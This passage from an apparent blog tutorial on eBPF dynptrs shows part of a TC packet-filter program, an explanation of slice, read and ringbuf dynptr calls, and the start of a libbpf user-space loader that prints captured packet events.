            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;iph&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ntohs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;tcp&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;source&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;

        &lt;span class="cm"&gt;/* Reserve variable-length ringbuf record */&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_dynptr&lt;/span&gt; &lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;total_sz&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_ringbuf_reserve_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;events&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;total_sz&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="cm"&gt;/* Must discard even on failure */&lt;/span&gt;
            &lt;span class="n"&gt;bpf_ringbuf_discard_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_SHOT&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;bpf_dynptr_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;bpf_dynptr_write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hdr&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;bpf_ringbuf_submit_dynptr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;drop&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_SHOT&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TC_ACT_OK&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program begins by declaring the kfuncs it needs. The &lt;code&gt;bpf_dynptr_from_skb()&lt;/code&gt; function creates a dynptr from the socket buffer, and &lt;code&gt;bpf_dynptr_slice()&lt;/code&gt; returns pointers to specific regions within it. The &lt;code&gt;__ksym&lt;/code&gt; attribute tells the loader these are kernel symbols to be resolved at load time.&lt;/p&gt;

&lt;p&gt;When parsing headers, notice how we provide local buffers (&lt;code&gt;eth_buf&lt;/code&gt;, &lt;code&gt;ip_buf&lt;/code&gt;, &lt;code&gt;tcp_buf&lt;/code&gt;) to each slice call. The slice function may return a pointer directly into packet data if it's linearly accessible, or it may copy data into our buffer and return a pointer to the buffer. Either way, we get a valid pointer we can dereference, or NULL on failure.&lt;/p&gt;

&lt;p&gt;The NULL check pattern is crucial. Each slice call can fail if the requested offset plus length exceeds packet bounds or if the data cannot be accessed for other reasons. Checking for NULL before using the returned pointer is mandatory.&lt;/p&gt;

&lt;p&gt;For ringbuf output, we use &lt;code&gt;bpf_dynptr_read()&lt;/code&gt; to copy TCP payload from the skb into a local buffer first. This demonstrates reading from an skb dynptr with runtime-determined length (bounded by configuration and available data). The read may fail if bounds are exceeded, in which case we set &lt;code&gt;snap_len&lt;/code&gt; to zero.&lt;/p&gt;

&lt;p&gt;The ringbuf dynptr reserve shows the variable-length allocation pattern. We compute the total size (header plus snapshot) and reserve that exact amount. After writing both the header and payload using &lt;code&gt;bpf_dynptr_write()&lt;/code&gt;, we submit the record. Note the discard call on reserve failure to satisfy the verifier's lifecycle requirements.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: dynptr_tc.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;arpa/inet.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;net/if.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"dynptr_tc.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="kt"&gt;sig_atomic_t&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;sig_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;signo&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;handle_event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event_hdr&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;INET_ADDRSTRLEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="n"&gt;inet_ntop&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;AF_INET&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"if=%u %s:%u -&amp;gt; %s:%u len=%u drop=%u snap=%u"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ifindex&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;saddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;sport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pkt_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;drop&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;data_sz&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;" payload=&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;payload&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
            &lt;span class="n"&gt;putchar&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;126&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="sc"&gt;'.'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;dynptr_cfg&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="cm"&gt;/* Parse arguments */&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-i"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ifname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-p"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;blocked_port&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-s"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;snap_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;atoi&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;strcmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="s"&gt;"-n"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enable_ringbuf&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;ifname&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
